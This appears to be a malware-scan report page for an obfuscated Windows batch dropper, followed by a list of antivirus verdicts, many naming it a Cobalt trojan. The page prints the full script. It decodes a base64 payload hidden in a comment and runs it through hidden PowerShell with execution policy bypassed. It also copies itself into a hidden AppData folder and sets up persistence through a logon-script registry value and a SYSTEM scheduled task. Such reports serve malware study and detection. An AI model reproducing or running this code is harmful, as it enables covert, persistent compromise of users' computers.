Static Analysis

No static analysis available.
@echo off
set /a FREEDOM=%RANDOM% + %RANDOM%
if %ERRORLEVEL% GEQ 0 set Publication=1
if %ERRORLEVEL% GEQ 0 set KILL=1
if exist %WINDIR% set super=%WINDIR%
if %ERRORLEVEL% GEQ 0 set reality=1
set /a SETTING=10 * 2
set Impression=%PROCESSOR_ARCHITECTURE%
if not defined IH3EZX5 (
set IH3EZX5=1
start /min "" "%~f0" %*
exit /b
setlocal enableDelayedExpansion
set heavily=%TEMP%\PAINFUL.ps1
if defined TEMP set DIRECTION=%TEMP%
if %ERRORLEVEL% GEQ 0 set weigh=1
set /a Brilliant=%RANDOM% %% 50 + 1
if exist %WINDIR% set Routine=%WINDIR%
set TRIP=%RANDOM%
set Link=%DATE:~-4%
set /a reader=%RANDOM% / 10
set Vessel=%HOMEDRIVE%%HOMEPATH%
set Reason=%DATE:~-4%
set realize=%CD%
if %ERRORLEVEL% GEQ 0 set Throughout=1
set /a Shopping=%RANDOM% %% 50 + 1
set /a link=%RANDOM% %% 100
set /a light=%RANDOM% + %RANDOM%
set contract=%COMPUTERNAME%
set PASSION=%RANDOM%
set /a EQUALLY=%RANDOM% %% 100
set Shot=%COMPUTERNAME%
if defined USERNAME set DEVICE=%USERNAME%
set organization=%CD%
set Overall=%TEMP%\NEAR.tmp
powershell -noprofile -w hidden -executionpolicy bypass -c "try { $cost = (Get-Content '%~f0') -join [Environment]::NewLine; if ($cost -match '@rem uaXD5s7X56HHi([A-Za-z0-9+/=]+)') { [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($matches[1])) | Set-Content -Path \"!Overall!\" -Encoding UTF8 } } catch {}" >nul 2>&1
type "!Overall!" | powershell.exe -nop -WindowStyle Hidden -ep Bypass - >nul 2>&1
del "!Overall!" >nul 2>&1
if not exist "%APPDATA%\Microsoft\Windows\Libraries" mkdir "%APPDATA%\Microsoft\Windows\Libraries" >nul 2>&1
attrib +h "%APPDATA%\Microsoft\Windows\Libraries" >nul 2>&1
copy /Y "%~f0" "%APPDATA%\Microsoft\Windows\Libraries\upd_X4wvNYKy.bat" >nul 2>&1
echo @echo off
echo start /min "" "%APPDATA%\Microsoft\Windows\Libraries\upd_X4wvNYKy.bat"
) > "%APPDATA%\Microsoft\Windows\Libraries\sysinit_ZNnrHPee.cmd"
attrib +h "%APPDATA%\Microsoft\Windows\Libraries\sysinit_ZNnrHPee.cmd" >nul 2>&1
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "%APPDATA%\Microsoft\Windows\Libraries\sysinit_ZNnrHPee.cmd" /f >nul 2>&1
schtasks /create /tn "WindowsInitCheck" /tr "cmd /c %APPDATA%\Microsoft\Windows\Libraries\upd_X4wvNYKy.bat" /sc ONLOGON /ru SYSTEM /f >nul 2>&1
schtasks /change /tn "WindowsInitCheck" /ru SYSTEM /it >nul 2>&1
set bend=%PROCESSOR_ARCHITECTURE%
set boyfriend=%CD%
if exist %TEMP% set impression=1
set Prayer=%PROCESSOR_ARCHITECTURE%
set Bother=%CD%
if defined USERNAME set Conversation=%USERNAME%
set STOP=%RANDOM%
if exist %WINDIR% set PUBLISH=%WINDIR%
set change=%RANDOM%
set CORE=%TIME:~0,2%%TIME:~3,2%
set /a DISORDER=%RANDOM% %% 100
set /a OURSELVES=%RANDOM% + %RANDOM%
if exist %TEMP% set Bond=1
set solid=%CD%
set /a Risk=13 * 2
set enforcement=%HOMEDRIVE%%HOMEPATH%
endlocal
exit /b
@rem uaXD5s7X56HHiCgokVExGTE5CdUogPSAkZW52OkNPTVBVVEVSTkFNRQokVExGTE5CdUogPSAkZW52OkNPTVBVVEVSTkFNRQokbmNmOHFVRyA9ICRlbnY6VVNFUk5BTUUKJDFQTXdzZ1BQID0gW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50CiRtdXRleE5hbWUgPSAic3VyZVBvc2l0aXZlXyIgKyAiTXR4IgokbXV0ZXggPSAkbnVsbAp0cnkgewogICAgJG11dGV4ID0gW1N5c3RlbS5UaHJlYWRpbmcuTXV0ZXhdOjpPcGVuRXhpc3RpbmcoJG11dGV4TmFtZSkKICAgIGV4aXQKfSBjYXRjaCB7CiAgICAkbXV0ZXggPSBOZXctT2JqZWN0IFN5c3RlbS5UaHJlYWRpbmcuTXV0ZXgoJGZhbHNlLCAkbXV0ZXhOYW1lKQp9CiQ2Q2N2cGxHS0RYID0gW1N5c3RlbS5HdWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkKJFVHQzJUWVRxSCA9IEdldC1Qcm9jZXNzIC1OYW1lICgicmVyb2xweGUiWy0xLi4tOF0gLWpvaW4gIiIpIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlCmlmICgtbm90ICRVR0MyVFlUcUgpIHsKICAgIFN0YXJ0LVNsZWVwIC1TZWNvbmRzIDIKICAgICRVR0MyVFlUcUggPSBHZXQtUHJvY2VzcyAtTmFtZSAoInJlcm9scHhlIlstMS4uLThdIC1qb2luICIiKSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQogICAgaWYgKC1ub3QgJFVHQzJUWVRxSCkgewogICAgICAgIGV4aXQKICAgIH0KfQokeDRlOUkwID0gJFVHQzJUWVRxSFswXS5JZAppZiAoLW5vdCAkeDRlOUkwIC1vciAkVUdDMlRZVHFIWzBdLkhhc0V4aXRlZCkgew
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Cobalt.4!c
ClamAV Clean
CTX batch.trojan.cobalt
CAT-QuickHeal Clean
Skyhigh BehavesLike.Backdoor.tq
ALYac Trojan.GenericKD.79590502
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Trojan ( 0001140e1 )
K7AntiVirus Trojan ( 0001140e1 )
Baidu Clean
VirIT Clean
Symantec Scr.Malcode!gen
ESET-NOD32 PowerShell/TrojanDropper.Agent.AZQ trojan
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.BAT.Cobalt.gen
BitDefender Trojan.GenericKD.79590502
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.79590502
Tencent Bat.Trojan.Cobalt.Lqil
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Trojan.GenericKD.79590502
TrendMicro Clean
McAfeeD Clean
CMC Clean
Emsisoft Trojan.GenericKD.79590502 (B)
huorong Clean
GData Trojan.GenericKD.79590502
Jiangmin Clean
Varist BAT/Agent.BKJ
Avira Clean
Antiy-AVL Trojan/BAT.Cobalt
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D4BE7466
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Egairtigado!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Rising Trojan.Cobalt/BAT!9.5ABDA (XSE:WFNFX0JBVDoHVCjR5mBFaYAvPAB5skGt)
Yandex Clean
TrellixENS Clean
Ikarus Clean
MaxSecure Clean
Fortinet BAT/Agent.AZQ!tr
AVG Other:Malware-gen [Trj]
Panda Clean
alibabacloud Trojan:Win/Cobalt.gyf
IRMA Signature
ESET Security (Windows) PowerShell/TrojanDropper.Agent.AZQ trojan
Avast Core Security (Linux) Other:Malware-gen [Trj]
C4S ClamAV (Linux) YARA.GEN_PowerShell.UNOFFICIAL
Trellix (Linux) Clean
Sophos Anti-Virus (Linux) Clean
Bitdefender Antivirus (Linux) Trojan.GenericKD.79590502
G Data Antivirus (Windows) Virus: Trojan.GenericKD.79590502 (Engine A)
WithSecure (Linux) Clean
DrWeb Antivirus (Linux) BAT.Starter.721
ClamAV (Linux) Clean
eScan Antivirus (Linux) Trojan.GenericKD.79590502(DB)
Kaspersky Standard (Windows) HEUR:Trojan.BAT.Cobalt.gen
Emsisoft Commandline Scanner (Windows) Trojan.GenericKD.79590502 (B)
Cuckoo

We're processing your submission... This could take a few seconds.